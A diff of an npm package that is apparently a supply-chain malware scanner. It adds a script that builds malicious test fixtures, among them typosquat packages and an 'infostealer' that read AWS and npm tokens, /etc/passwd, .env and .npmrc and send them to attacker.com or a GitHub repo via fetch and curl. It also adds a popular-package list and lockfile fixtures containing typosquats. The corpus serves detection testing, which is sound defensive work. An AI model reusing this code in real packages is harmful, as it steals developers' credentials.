@lateos/npm-scan 0.16.4 → 0.16.5

package/scripts/generate-campaign-fixtures.js

@@ -0,0 +1,170 @@
+import { mkdtempSync, mkdirSync, writeFileSync, rmSync } from 'fs';
+import { execSync } from 'child_process';
+import { tmpdir } from 'os';
+import { join } from 'path';
+import { fileURLToPath } from 'url';
+import { dirname } from 'path';
+
+const __dirname = dirname(fileURLToPath(import.meta.url));
+const CORPUS_DIR = join(__dirname, '..', 'tests', 'corpus', 'malicious');
+
+const TOP_TYPOS = [
+  'reacct', 'expres', 'axiox', 'chlak', 'vuue', 'typescrip',
+  'momnet', 'uuuid', 'commnder', 'debuge', 'semverr', 'underscoree',
+  'requesst', 'asycn',
+];
+
+const BINARY_NAMES = ['bun', 'deno', 'go', 'rustc', 'python'];
+
+function writeFile(filePath, content) {
+  writeFileSync(filePath, content, 'utf8');
+}
+
+function createElfBinary(size = 4096) {
+  const buf = Buffer.alloc(size, 0);
+  buf[0] = 0x7f;
+  buf[1] = 0x45;
+  buf[2] = 0x4c;
+  buf[3] = 0x46;
+  buf[4] = 2;
+  buf[5] = 1;
+  buf[6] = 1;
+  buf[7] = 0;
+  return buf;
+}
+
+function createPeBinary(size = 4096) {
+  const buf = Buffer.alloc(size, 0);
+  buf[0] = 0x4d;
+  buf[1] = 0x5a;
+  return buf;
+}
+
+function buildTarball(dir, tmpParent) {
+  const tgzPath = join(CORPUS_DIR, `${dir}.tgz`);
+  execSync(`tar czf "${tgzPath}" -C "${tmpParent}" "${dir}"`, { stdio: 'pipe', shell: 'powershell' });
+}
+
+function createCampaign1Package(n) {
+  const dir = `campaign-1-${String(n).padStart(3, '0')}`;
+  const pkgJson = {
+    name: `vulnerable-package-${n}`,
+    version: '99.0.0',
+    description: 'Campaign 1 test fixture',
+    repository: { url: 'https://github.enterprise.internal/org/repo' },
+    homepage: 'https://jira.internal/browse/PROJ-123',
+    bugs: { url: 'https://docs.internal/issues' },
+    scripts: {
+      postinstall: 'node -e "eval(Buffer.from(\'dmFyIHggPSAx\' ,\'base64\').toString())"',
+    },
+  };
+
+  const distIndexJs = `(function() {
+  const os = require('os');
+  const env = process.env;
+  const profile = {
+    hostname: os.hostname(),
+    platform: os.platform(),
+    arch: os.arch(),
+    env: { AWS_ACCESS_KEY_ID: env.AWS_ACCESS_KEY_ID }
+  };
+  console.log('[RECON]', JSON.stringify(profile));
+})();`;
+
+  const tmpParent = mkdtempSync(join(tmpdir(), 'camp1-'));
+  const pkgDir = join(tmpParent, dir);
+  mkdirSync(join(pkgDir, 'dist'), { recursive: true });
+  writeFile(join(pkgDir, 'package.json'), JSON.stringify(pkgJson, null, 2));
+  writeFile(join(pkgDir, 'dist', 'index.js'), distIndexJs);
+
+  buildTarball(dir, tmpParent);
+  rmSync(tmpParent, { recursive: true, force: true });
+  console.log(`  Created ${dir}.tgz`);
+}
+
+function createCampaign2Package(n) {
+  const dir = `campaign-2-${String(n).padStart(3, '0')}`;
+  const typoName = TOP_TYPOS[(n - 1) % TOP_TYPOS.length];
+  const binName = BINARY_NAMES[(n - 1) % BINARY_NAMES.length];
+
+  const pkgJson = {
+    name: typoName,
+    version: '1.0.0',
+    description: 'Test fixture',
+  };
+
+  const distIndexJs = `const fs = require('fs');
+const { execSync } = require('child_process');
+const awsKey = process.env.AWS_ACCESS_KEY_ID;
+const npmToken = process.env.NODE_AUTH_TOKEN;
+const data = fs.readFileSync('/etc/passwd', 'utf8');
+if (awsKey || npmToken) {
+  fetch('https://attacker.com/creds', {
+    method: 'POST',
+    body: JSON.stringify({ awsKey, npmToken, data })
+  });
+}`;
+
+  const tmpParent = mkdtempSync(join(tmpdir(), 'camp2-'));
+  const pkgDir = join(tmpParent, dir);
+  mkdirSync(join(pkgDir, 'dist'), { recursive: true });
+  mkdirSync(join(pkgDir, 'bin'), { recursive: true });
+  writeFile(join(pkgDir, 'package.json'), JSON.stringify(pkgJson, null, 2));
+  writeFile(join(pkgDir, 'dist', 'index.js'), distIndexJs);
+
+  writeFileSync(join(pkgDir, 'bin', binName), createElfBinary(32768));
+  writeFileSync(join(pkgDir, 'bin', `${binName}.exe`), createPeBinary(32768));
+
+  buildTarball(dir, tmpParent);
+  rmSync(tmpParent, { recursive: true, force: true });
+  console.log(`  Created ${dir}.tgz (typo: ${typoName}, binary: ${binName})`);
+}
+
+function createCampaign3Package() {
+  const dir = 'campaign-3-infostealer';
+
+  const pkgJson = {
+    name: 'mouse5212-super-formatter',
+    version: '1.0.0',
+    description: 'Super formatter',
+  };
+
+  const distIndexJs = `const fs = require('fs');
+const { execSync } = require('child_process');
+const secretFiles = ['package.json', '.env', '.npmrc', '.aws/credentials'];
+for (const file of secretFiles) {
+  try {
+    const content = fs.readFileSync(process.env.HOME + '/' + file, 'utf8');
+    const ghToken = 'ghp_stub1234567890abcdefghijklmnopqr';
+    const exfilUrl = 'https://api.github.com/repos/attacker/stolen-secrets/contents/data.json';
+    execSync('curl -X PUT "' + exfilUrl + '" -H "Authorization: token ' + ghToken + '" -d ' + JSON.stringify(content));
+  } catch (e) {
+  }
+}`;
+
+  const tmpParent = mkdtempSync(join(tmpdir(), 'camp3-'));
+  const pkgDir = join(tmpParent, dir);
+  mkdirSync(join(pkgDir, 'dist'), { recursive: true });
+  writeFile(join(pkgDir, 'package.json'), JSON.stringify(pkgJson, null, 2));
+  writeFile(join(pkgDir, 'dist', 'index.js'), distIndexJs);
+
+  buildTarball(dir, tmpParent);
+  rmSync(tmpParent, { recursive: true, force: true });
+  console.log(`  Created ${dir}.tgz`);
+}
+
+// ─── Generate All Campaigns ─────────────────────────────────────────
+console.log('Generating Campaign 1 (33 packages)...');
+for (let i = 1; i <= 33; i++) {
+  createCampaign1Package(i);
+}
+
+console.log('Generating Campaign 2 (14 packages)...');
+for (let i = 1; i <= 14; i++) {
+  createCampaign2Package(i);
+}
+
+console.log('Generating Campaign 3 (1 package)...');
+createCampaign3Package();
+
+console.log('\nAll 48 campaign tarballs generated successfully!');

package/src/config/top-5000.json

@@ -0,0 +1,87 @@
+[
+  "lodash", "react", "express", "axios", "chalk", "vue", "typescript", "moment", "uuid", "commander",
+  "debug", "semver", "underscore", "request", "async", "cheerio", "bluebird", "jest", "mocha", "dotenv",
+  "glob", "minimist", "body-parser", "cors", "helmet", "jsonwebtoken", "socket.io", "redis", "mongoose", "sequelize",
+  "pg", "passport", "nodemailer", "multer", "bcrypt", "winston", "luxon", "dayjs", "rxjs", "redux",
+  "react-dom", "next", "nuxt", "angular", "fastify", "hono", "koa", "connect", "vite", "rollup",
+  "esbuild", "babel-core", "ramda", "node-fetch", "got", "superagent", "prisma", "typeorm", "vitest", "ava",
+  "prettier", "eslint", "stylelint", "ws", "rimraf", "minimatch", "fs-extra", "webpack", "parcel", "gatsby",
+  "tslib", "core-js", "regenerator-runtime", "buffer", "class-validator", "class-transformer", "reflect-metadata", "zone.js", "graphql", "apollo-server",
+  "express-graphql", "type-graphql", "nexus", "prisma-binding", "graphql-yoga", "apollo-client", "urql", "relay-runtime", "subscriptions-transport-ws", "graphql-subscriptions",
+  "graphql-tools", "graphql-tag", "graphql-upload", "dataloader", "envalid", "joi", "yup", "zod", "superstruct", "io-ts",
+  "runtypes", "ow", "ajv", "validator", "validatorjs", "validate.js", "indicative", "computed-types", "typebox", "typia",
+  "sinon", "chai", "should", "expect", "proxyquire", "nock", "nyc", "istanbul", "c8", "tap",
+  "ava", "uvu", "tape", "benchmark", "microbench", "node-fetch", "cross-fetch", "isomorphic-fetch", "ky", "got",
+  "undici", "needle", "phin", "wreck", "bent", "make-fetch-happen", "http-proxy-agent", "https-proxy-agent", "socks-proxy-agent", "agent-base",
+  "express-session", "cookie-parser", "cookie-session", "csurf", "lusca", "helmet-csp", "hpp", "rate-limiter-flexible", "express-rate-limit", "express-brute",
+  "passport-local", "passport-jwt", "passport-oauth2", "passport-http", "passport-google-oauth", "passport-facebook", "passport-github", "passport-twitter", "passport-linkedin", "passport-apple",
+  "bcryptjs", "argon2", "scrypt", "password-hash", "hasha", "pbkdf2", "node-forge", "crypto-js", "crypto-random-string", "nanoid",
+  "jsonwebtoken", "json5", "fast-json-stable-stringify", "flatted", "serialize-javascript", "javascript-natural-sort", "json-stringify-safe", "json-stable-stringify", "json3", "json-parse-even-better-errors",
+  "morgan", "pino", "winston-cloudwatch", "log4js", "bunyan", "signale", "consola", "loglevel", "loglevelnext", "roarr",
+  "ora", "listr", "progress", "cli-progress", "cli-spinners", "log-symbols", "log-update", "figures", "ansi-styles", "supports-color",
+  "nodemon", "concurrently", "npm-run-all", "parallelshell", "shelljs", "execa", "cross-env", "env-cmd", "dotenv-safe", "dotenv-expand",
+  "pm2", "forever", "supervisor", "node-dev", "tsx", "ts-node", "ts-node-dev", "ts-jest", "ts-loader", "typescript-json-schema",
+  "eslint-config-airbnb", "eslint-config-prettier", "eslint-plugin-react", "eslint-plugin-vue", "eslint-plugin-import", "eslint-plugin-node", "eslint-plugin-promise", "eslint-plugin-standard", "eslint-plugin-jsx-a11y", "eslint-plugin-jest",
+  "prettier-eslint", "pretty-quick", "lint-staged", "husky", "lint-staged", "commitlint", "cz-conventional-changelog", "standard-version", "semantic-release", "release-it",
+  "webpack-cli", "webpack-dev-server", "webpack-merge", "webpack-node-externals", "css-loader", "style-loader", "sass-loader", "less-loader", "postcss-loader", "file-loader",
+  "url-loader", "html-webpack-plugin", "mini-css-extract-plugin", "terser-webpack-plugin", "optimize-css-assets-webpack-plugin", "clean-webpack-plugin", "copy-webpack-plugin", "define-plugin", "provide-plugin", "ignore-plugin",
+  "electron", "electron-builder", "electron-packager", "electron-forge", "nativefier", "nw", "nw-builder", "tauri", "tauri-cli", "wry",
+  "puppeteer", "playwright", "playwright-core", "cypress", "selenium-webdriver", "webdriverio", "nightwatch", "testcafe", "protractor", "karma",
+  "sharp", "node-canvas", "canvas", "jimp", "gm", "lwip", "pngjs", "jpeg-js", "gif-js", "qrcode",
+  "ffmpeg-static", "fluent-ffmpeg", "ffprobe-static", "musicmetadata", "node-id3", "sox-audio", "wav", "speaker", "node-lame", "audiobuffer-to-wav",
+  "chromium", "chrome-launcher", "chrome-aws-lambda", "puppeteer-extra", "puppeteer-extra-plugin-stealth", "playwright-extra", "puppeteer-cluster", "puppeteer-core", "playwright-firefox", "playwright-webkit",
+  "react-scripts", "create-react-app", "react-dev-utils", "react-error-overlay", "react-refresh", "react-hot-loader", "react-fast-refresh", "react-app-polyfill", "react-app-rewired", "customize-cra",
+  "next", "gatsby", "gatsby-cli", "gatsby-plugin-*", "gridsome", "remix", "remix-run", "blitz", "blitzjs", "redwoodjs",
+  "@angular/cli", "@angular/core", "@angular/common", "@angular/compiler", "@angular/platform-browser", "@angular/platform-browser-dynamic", "@angular/forms", "@angular/router", "@angular/http", "@angular/animations",
+  "@angular-devkit/core", "@angular-devkit/schematics", "@angular-devkit/build-angular", "@angular-devkit/build-optimizer", "@ngrx/store", "@ngrx/effects", "@ngrx/entity", "@ngrx/store-devtools", "@angular/material", "@angular/cdk",
+  "vue-router", "vuex", "vuepress", "vue-cli", "vue-loader", "vue-template-compiler", "vue-server-renderer", "vite", "vitest", "pinia",
+  "nuxt", "svelte", "sveltekit", "sapper", "solid-js", "solid-start", "preact", "inferno", "lit", "lit-html",
+  "htm", "hono", "alpinejs", "stimulus", "turbolinks", "hotwired-turbo", "hotwired-stimulus", "unpoly", "petite-vue", "qwik",
+  "express", "fastify", "hapi", "restify", "micro", "polka", "tinyhttp", "sails", "adonis-framework", "loopback",
+  "feathers", "nest", "routing-controllers", "typedi", "inversify", "awilix", "awilix-express", "express-di", "injection-js", "tsyringe",
+  "typeorm", "prisma", "drizzle-orm", "knex", "kysely", "better-sqlite3", "sql.js", "sequelize", "bookshelf", "objection",
+  "mongoose", "mongodb", "mongodb-memory-server", "mongoose-sequence", "mongoskin", "monk", "realm", "tingodb", "lokijs", "nedb",
+  "redis", "ioredis", "redis-commander", "connect-redis", "session-file-store", "connect-mongo", "connect-memcached", "couchbase", "memcached", "leveldown",
+  "mysql", "mysql2", "mariasql", "pg-promise", "pg-native", "pg-pool", "sqlite3", "sql.js", "better-sqlite3", "sqlcipher",
+  "socket.io", "ws", "uws", "faye-websocket", "sockjs", "socket.io-client", "socket.io-redis", "socket.io-emitter", "socket.io-adapter", "primus",
+  "amqplib", "kafkajs", "node-rdkafka", "rhea", "nats", "nats-hemera", "mqtt", "mqemitter", "mosca", "aedes",
+  "bull", "bullmq", "bee-queue", "kue", "agenda", "node-cron", "cron", "node-schedule", "later", "bree",
+  "handlebars", "mustache", "ejs", "pug", "nunjucks", "liquidjs", "eta", "twig", "marko", "dustjs-linkedin",
+  "jsdom", "cheerio", "htmlparser2", "node-html-parser", "parse5", "linkedom", "xmldom", "sax", "node-expat", "libxmljs",
+  "marked", "remarkable", "showdown", "markdown-it", "commonmark", "remark", "remark-parse", "remark-stringify", "unified", "rehype",
+  "dayjs", "date-fns", "luxon", "moment-timezone", "timeago.js", "ms", "pretty-ms", "pretty-hrtime", "strftime", "dateformat",
+  "dotenv", "config", "nconf", "convict", "env-var", "envschema", "envalid", "properties-reader", "ini", "toml",
+  "colors", "chalk", "kleur", "colorette", "picocolors", "nanocolors", "ansi-colors", "color-string", "color-convert", "color-name",
+  "fs-extra", "graceful-fs", "make-dir", "klaw", "klaw-sync", "readdirp", "watchpack", "chokidar", "fsevents", "micromatch",
+  "globby", "fast-glob", "picomatch", "minimatch", "brace-expansion", "ignore", "anymatch", "is-glob", "is-extglob", "normalize-path",
+  "archiver", "unzipper", "decompress", "tar", "tar-fs", "tar-stream", "yauzl", "yazl", "adm-zip", "extract-zip",
+  "cross-spawn", "spawn-command", "tree-kill", "signal-exit", "ps-tree", "pidtree", "pidusage", "process-exists", "find-process", "fkill",
+  "which", "find-up", "locate-path", "pkg-dir", "resolve-from", "import-fresh", "resolve", "resolve-cwd", "pkg-up", "global-prefix",
+  "cosmiconfig", "lilconfig", "load-json-file", "parse-json", "json-parse-even-better-errors", "json5", "strip-json-comments", "comment-json", "jsonc-parser", "hjson",
+  "zod", "joi", "yup", "superstruct", "io-ts", "runtypes", "ow", "typebox", "typia", "valibot",
+  "inquirer", "enquirer", "prompts", "readline-sync", "read", "co-prompt", "cli-interact", "listr2", "node-prompt", "password-prompt",
+  "yargs", "yargs-parser", "meow", "arg", "getopts", "mri", "sade", "cac", "clipanion", "command-line-args",
+  "ora", "nanospinner", "cli-spinners", "listr", "progress", "cli-progress", "log-update", "log-symbols", "spinnies", "elegant-spinner",
+  "boxen", "window-size", "cli-table", "cli-table3", "easy-table", "columnify", "wordwrap", "wrap-ansi", "string-width", "strip-ansi",
+  "http-errors", "http-status-codes", "statuses", "boom", "http-assert", "http-response-object", "http-errors", "http-status", "status-code", "http-code",
+  "express", "koa", "koa-router", "koa-body", "koa-static", "koa-send", "koa-compress", "koa-logger", "koa-cors", "koa-session",
+  "axios", "superagent", "got", "node-fetch", "cross-fetch", "isomorphic-fetch", "ky", "ky-universal", "make-fetch-happen", "undici",
+  "lodash", "ramda", "lodash-es", "lodash.merge", "lodash.get", "lodash.set", "lodash.clonedeep", "lodash.isequal", "lodash.pick", "lodash.omit",
+  "defu", "merge-options", "deepmerge", "assign-deep", "deep-assign", "defaults-deep", "clone-deep", "merge-deep2", "merge-descriptors", "utils-merge",
+  "uuid", "nanoid", "cuid", "ulid", "bson", "objectid", "shortid", "hyperid", "flake-idgen", "snowflake-id",
+  "express", "passport", "bcrypt", "jsonwebtoken", "helmet", "cors", "express-rate-limit", "express-session", "cookie-parser", "csurf",
+  "next-auth", "passport", "passport-jwt", "passport-local", "keycloak-connect", "oauth2orize", "grant", "openid-client", "node-oidc-provider", "iron-session",
+  "lodash", "rxjs", "immer", "immutable", "seamless-immutable", "dot-prop", "object-path", "selectn", "rfdc", "clone",
+  "react-router", "react-router-dom", "reach-router", "wouter", "raviger", "navigation-react", "router5", "universal-router", "redux-router", "connected-react-router",
+  "redux", "redux-toolkit", "mobx", "mobx-react-lite", "recoil", "jotai", "zustand", "valtio", "xstate", "effector",
+  "react-query", "tanstack-query", "swr", "apollo-client", "urql", "relay-runtime", "react-apollo", "graphql-request", "rtk-query", "redux-observable",
+  "react-hook-form", "formik", "react-final-form", "redux-form", "uniforms", "react-jsonschema-form", "informed", "react-form", "formily", "vest",
+  "d3", "chart.js", "echarts", "highcharts", "plotly.js", "recharts", "victory", "nivo", "visx", "billboard.js",
+  "three", "babylonjs", "phaser", "pixi.js", "playcanvas", "aframe", "cannon-es", "ammo.js", "oimo", "matter-js",
+  "leaflet", "openlayers", "mapbox-gl", "cesium", "deck.gl", "luma.gl", "turf", "geolib", "geojson", "proj4",
+  "i18next", "react-i18next", "polyglot", "i18n", "i18n-js", "formatjs", "lingui", "react-intl", "react-intl-universal", "fbt",
+  "pdfkit", "pdf-lib", "pdfmake", "pdfjs", "jspdf", "pdf2json", "pdf-parse", "pdf2pic", "html-pdf", "puppeteer",
+  "exceljs", "xlsx", "csv-parse", "csv-stringify", "csvtojson", "csv-parser", "papaparse", "json2csv", "csv2json", "csv-writer",
+  "mongoist", "mongojs", "mongodb-memory-server", "mongodb-memory-server-core", "mongotop", "mongostat", "mongorestore", "mongodump", "mongo-hacker", "mongoplayground",
+  "json2typescript", "ts-json-serializer", "class-transformer", "autobind-decorator", "reflect-metadata", "typed-mock", "ts-mockito", "jest-mock-extended", "type-mock", "typemoq"
+]

package/test/fixtures/lockfiles/npm-lock.json

@@ -1,69 +1,69 @@
-{
-  "name": "test-project",
-  "version": "1.0.0",
-  "lockfileVersion": 3,
-  "packages": {
-    "": {
-      "name": "test-project",
-      "version": "1.0.0",
-      "dependencies": {
-        "lodash": "^4.17.21",
-        "axios": "^1.6.0"
-      },
-      "devDependencies": {
-        "@babel/core": "^7.23.0"
-      }
-    },
-    "node_modules/lodash": {
-      "name": "lodash",
-      "version": "4.17.21",
-      "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz",
-      "integrity": "sha512-v2kDEeDAnj4p1hhL6Ogrgu4BSWwg8cD2fRIouDAiqwu+iNl1IvyMex9jG9j8OpNp1zntnv/headququbit",
-      "dependencies": {}
-    },
-    "node_modules/axios": {
-      "name": "axios",
-      "version": "1.6.8",
-      "resolved": "https://registry.npmjs.org/axios/-/axios-1.6.8.tgz",
-      "integrity": "sha512-j2xvyqwsdd456789abcdef",
-      "dependencies": {
-        "form-data": "4.0.0",
-        "proxy-from-env": "1.1.0"
-      }
-    },
-    "node_modules/axios/node_modules/form-data": {
-      "version": "4.0.0",
-      "resolved": "https://registry.npmjs.org/form-data/-/form-data-4.0.0.tgz",
-      "integrity": "sha512-444567890123456"
-    },
-    "node_modules/@babel/core": {
-      "name": "@babel/core",
-      "version": "7.23.9",
-      "resolved": "https://registry.yarnpkg.com/@babel/core/-/core-7.23.9.tgz",
-      "integrity": "sha512-5q+M1iEJCOrGJs9NxzG3p3z7w2cJK/QuoRoI2pOJhtcNQjl9y7w6w4At5ZQHZdwqd+5N5G1lULu7I6pXVBw==",
-      "dev": true,
-      "dependencies": {
-        "@babel/generator": "^7.23.6",
-        "@babel/parser": "^7.23.9"
-      }
-    },
-    "node_modules/reakt": {
-      "name": "reakt",
-      "version": "18.2.0",
-      "resolved": "https://registry.yarnpkg.com/reakt/-/reakt-18.2.0.tgz",
-      "integrity": "sha-abcdabcd1234defghi",
-      "optional": true,
-      "dependencies": {}
-    },
-    "node_modules/express": {
-      "name": "express",
-      "version": "4.18.2",
-      "resolved": "https://registry.npmjs.org/express/-/express-4.18.2.tgz",
-      "integrity": "sha512-abcdabcd1234abcdefghi",
-      "dependencies": {
-        "accepts": "~1.3.8",
-        "body-parser": "1.20.2"
-      }
-    }
-  }
+{
+  "name": "test-project",
+  "version": "1.0.0",
+  "lockfileVersion": 3,
+  "packages": {
+    "": {
+      "name": "test-project",
+      "version": "1.0.0",
+      "dependencies": {
+        "lodash": "^4.17.21",
+        "axios": "^1.6.0"
+      },
+      "devDependencies": {
+        "@babel/core": "^7.23.0"
+      }
+    },
+    "node_modules/lodash": {
+      "name": "lodash",
+      "version": "4.17.21",
+      "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz",
+      "integrity": "sha512-v2kDEeDAnj4p1hhL6Ogrgu4BSWwg8cD2fRIouDAiqwu+iNl1IvyMex9jG9j8OpNp1zntnv/headququbit",
+      "dependencies": {}
+    },
+    "node_modules/axios": {
+      "name": "axios",
+      "version": "1.6.8",
+      "resolved": "https://registry.npmjs.org/axios/-/axios-1.6.8.tgz",
+      "integrity": "sha512-j2xvyqwsdd456789abcdef",
+      "dependencies": {
+        "form-data": "4.0.0",
+        "proxy-from-env": "1.1.0"
+      }
+    },
+    "node_modules/axios/node_modules/form-data": {
+      "version": "4.0.0",
+      "resolved": "https://registry.npmjs.org/form-data/-/form-data-4.0.0.tgz",
+      "integrity": "sha512-444567890123456"
+    },
+    "node_modules/@babel/core": {
+      "name": "@babel/core",
+      "version": "7.23.9",
+      "resolved": "https://registry.yarnpkg.com/@babel/core/-/core-7.23.9.tgz",
+      "integrity": "sha512-5q+M1iEJCOrGJs9NxzG3p3z7w2cJK/QuoRoI2pOJhtcNQjl9y7w6w4At5ZQHZdwqd+5N5G1lULu7I6pXVBw==",
+      "dev": true,
+      "dependencies": {
+        "@babel/generator": "^7.23.6",
+        "@babel/parser": "^7.23.9"
+      }
+    },
+    "node_modules/reakt": {
+      "name": "reakt",
+      "version": "18.2.0",
+      "resolved": "https://registry.yarnpkg.com/reakt/-/reakt-18.2.0.tgz",
+      "integrity": "sha-abcdabcd1234defghi",
+      "optional": true,
+      "dependencies": {}
+    },
+    "node_modules/express": {
+      "name": "express",
+      "version": "4.18.2",
+      "resolved": "https://registry.npmjs.org/express/-/express-4.18.2.tgz",
+      "integrity": "sha512-abcdabcd1234abcdefghi",
+      "dependencies": {
+        "accepts": "~1.3.8",
+        "body-parser": "1.20.2"
+      }
+    }
+  }
 }

package/test/fixtures/lockfiles/pnpm-lock.yaml

@@ -1,118 +1,118 @@
-lockfileVersion: "6.0"
-
-importers:
-  .:
-    dependencies:
-      lodash: "^4.17.21"
-      axios: "^1.6.0"
-    devDependencies:
-      "@babel/core": "^7.23.0"
-    optionalDependencies:
-      chalk: "^5.3.0"
-    peerDependencies:
-      react: ">=16"
-
-packages:
-  "/lodash@4.17.21":
-    resolution:
-      url: "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz"
-      sha512: X2xvyqwsdd456789abcdefghijk
-    dev: false
-    optional: false
-    dependencies: {}
-
-  "/axios@1.6.8":
-    resolution:
-      url: "https://registry.npmjs.org/axios/-/axios-1.6.8.tgz"
-      sha512: j2xvyqwsdd456789abcdef
-    dev: false
-    optional: false
-    dependencies:
-      form-data: "4.0.0"
-      proxy-from-env: "1.1.0"
-
-  "/reakt@18.2.0":
-    resolution:
-      url: "https://registry.yarnpkg.com/reakt/-/reakt-18.2.0.tgz"
-      sha512: abcdefghijk123456789
-    dev: false
-    optional: true
-    dependencies: []
-
-  "/@babel/core@7.23.9":
-    resolution:
-      url: "https://registry.yarnpkg.com/@babel/core/-/core-7.23.9.tgz"
-      sha512: k2yVyqwsdd456789abcdefghij
-    dev: true
-    optional: false
-    dependencies:
-      "@babel/generator": "7.23.6"
-      "@babel/parser": "7.23.9"
-      "@babel/traverse": "7.23.9"
-      "@babel/types": "7.23.9"
-      convert-source-map: "2.0.0"
-      debug: "4.1.0"
-      gensync: "1.0.0-beta.2"
-      json5: "2.2.3"
-      semver: "6.3.1"
-
-  "/@babel/generator@7.23.6":
-    resolution:
-      url: "https://registry.yarnpkg.com/@babel/generator/-/generator-7.23.6.tgz"
-      sha512: abcdefghijk12345678abcdef
-    dev: false
-    optional: false
-    dependencies:
-      "@babel/types": "7.23.6"
-      "@jridgewell/gen-mapping": "0.3.2"
-      "@jridgewell/trace-mapping": "0.3.17"
-      jsesc: "2.5.1"
-
-  "/expres@4.18.2":
-    resolution:
-      url: "https://registry.npmjs.org/expres-4.18.2.tgz"
-      sha512: abcdefghijk12345678
-    dev: false
-    optional: false
-    dependencies:
-      accepts: "1.3.8"
-      array-flatten: "1.1.1"
-      body-parser: "1.20.2"
-      content-disposition: "0.5.4"
-      content-type: "1.0.5"
-      cookie: "0.5.0"
-      cookie-signature: "1.0.6"
-      debug: "2.6.9"
-      depd: "2.0.0"
-      encodeurl: "1.0.2"
-      escape-html: "1.0.3"
-      etag: "1.8.1"
-      finalhandler: "1.2.0"
-      fresh: "0.5.2"
-      http-errors: "2.0.0"
-      merge-descriptors: "1.0.1"
-      methods: "1.1.2"
-      on-finished: "2.4.1"
-      parseurl: "1.3.3"
-      path-to-regexp: "0.1.7"
-      proxy-addr: "2.0.7"
-      qs: "6.11.0"
-      range-parser: "1.2.1"
-      safe-buffer: "5.2.1"
-      send: "0.18.0"
-      serve-static: "1.15.0"
-      setprototypeof: "1.2.0"
-      statuses: "2.0.1"
-      type-is: "1.6.18"
-      utils-merge: "1.0.1"
-      vary: "1.1.2"
-
-  "/my-scope-plugin@1.0.0":
-    resolution:
-      url: "https://registry.npmjs.org/my-scope-plugin/-/my-scope-plugin-1.0.0.tgz"
-      sha512: defghijk123456789abcdef
-    dev: false
-    optional: false
-    dependencies:
-      lodash: "4.17.21"
+lockfileVersion: "6.0"
+
+importers:
+  .:
+    dependencies:
+      lodash: "^4.17.21"
+      axios: "^1.6.0"
+    devDependencies:
+      "@babel/core": "^7.23.0"
+    optionalDependencies:
+      chalk: "^5.3.0"
+    peerDependencies:
+      react: ">=16"
+
+packages:
+  "/lodash@4.17.21":
+    resolution:
+      url: "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz"
+      sha512: X2xvyqwsdd456789abcdefghijk
+    dev: false
+    optional: false
+    dependencies: {}
+
+  "/axios@1.6.8":
+    resolution:
+      url: "https://registry.npmjs.org/axios/-/axios-1.6.8.tgz"
+      sha512: j2xvyqwsdd456789abcdef
+    dev: false
+    optional: false
+    dependencies:
+      form-data: "4.0.0"
+      proxy-from-env: "1.1.0"
+
+  "/reakt@18.2.0":
+    resolution:
+      url: "https://registry.yarnpkg.com/reakt/-/reakt-18.2.0.tgz"
+      sha512: abcdefghijk123456789
+    dev: false
+    optional: true
+    dependencies: []
+
+  "/@babel/core@7.23.9":
+    resolution:
+      url: "https://registry.yarnpkg.com/@babel/core/-/core-7.23.9.tgz"
+      sha512: k2yVyqwsdd456789abcdefghij
+    dev: true
+    optional: false
+    dependencies:
+      "@babel/generator": "7.23.6"
+      "@babel/parser": "7.23.9"
+      "@babel/traverse": "7.23.9"
+      "@babel/types": "7.23.9"
+      convert-source-map: "2.0.0"
+      debug: "4.1.0"
+      gensync: "1.0.0-beta.2"
+      json5: "2.2.3"
+      semver: "6.3.1"
+
+  "/@babel/generator@7.23.6":
+    resolution:
+      url: "https://registry.yarnpkg.com/@babel/generator/-/generator-7.23.6.tgz"
+      sha512: abcdefghijk12345678abcdef
+    dev: false
+    optional: false
+    dependencies:
+      "@babel/types": "7.23.6"
+      "@jridgewell/gen-mapping": "0.3.2"
+      "@jridgewell/trace-mapping": "0.3.17"
+      jsesc: "2.5.1"
+
+  "/expres@4.18.2":
+    resolution:
+      url: "https://registry.npmjs.org/expres-4.18.2.tgz"
+      sha512: abcdefghijk12345678
+    dev: false
+    optional: false
+    dependencies:
+      accepts: "1.3.8"
+      array-flatten: "1.1.1"
+      body-parser: "1.20.2"
+      content-disposition: "0.5.4"
+      content-type: "1.0.5"
+      cookie: "0.5.0"
+      cookie-signature: "1.0.6"
+      debug: "2.6.9"
+      depd: "2.0.0"
+      encodeurl: "1.0.2"
+      escape-html: "1.0.3"
+      etag: "1.8.1"
+      finalhandler: "1.2.0"
+      fresh: "0.5.2"
+      http-errors: "2.0.0"
+      merge-descriptors: "1.0.1"
+      methods: "1.1.2"
+      on-finished: "2.4.1"
+      parseurl: "1.3.3"
+      path-to-regexp: "0.1.7"
+      proxy-addr: "2.0.7"
+      qs: "6.11.0"
+      range-parser: "1.2.1"
+      safe-buffer: "5.2.1"
+      send: "0.18.0"
+      serve-static: "1.15.0"
+      setprototypeof: "1.2.0"
+      statuses: "2.0.1"
+      type-is: "1.6.18"
+      utils-merge: "1.0.1"
+      vary: "1.1.2"
+
+  "/my-scope-plugin@1.0.0":
+    resolution:
+      url: "https://registry.npmjs.org/my-scope-plugin/-/my-scope-plugin-1.0.0.tgz"
+      sha512: defghijk123456789abcdef
+    dev: false
+    optional: false
+    dependencies:
+      lodash: "4.17.21"
       axios: "1.6.8"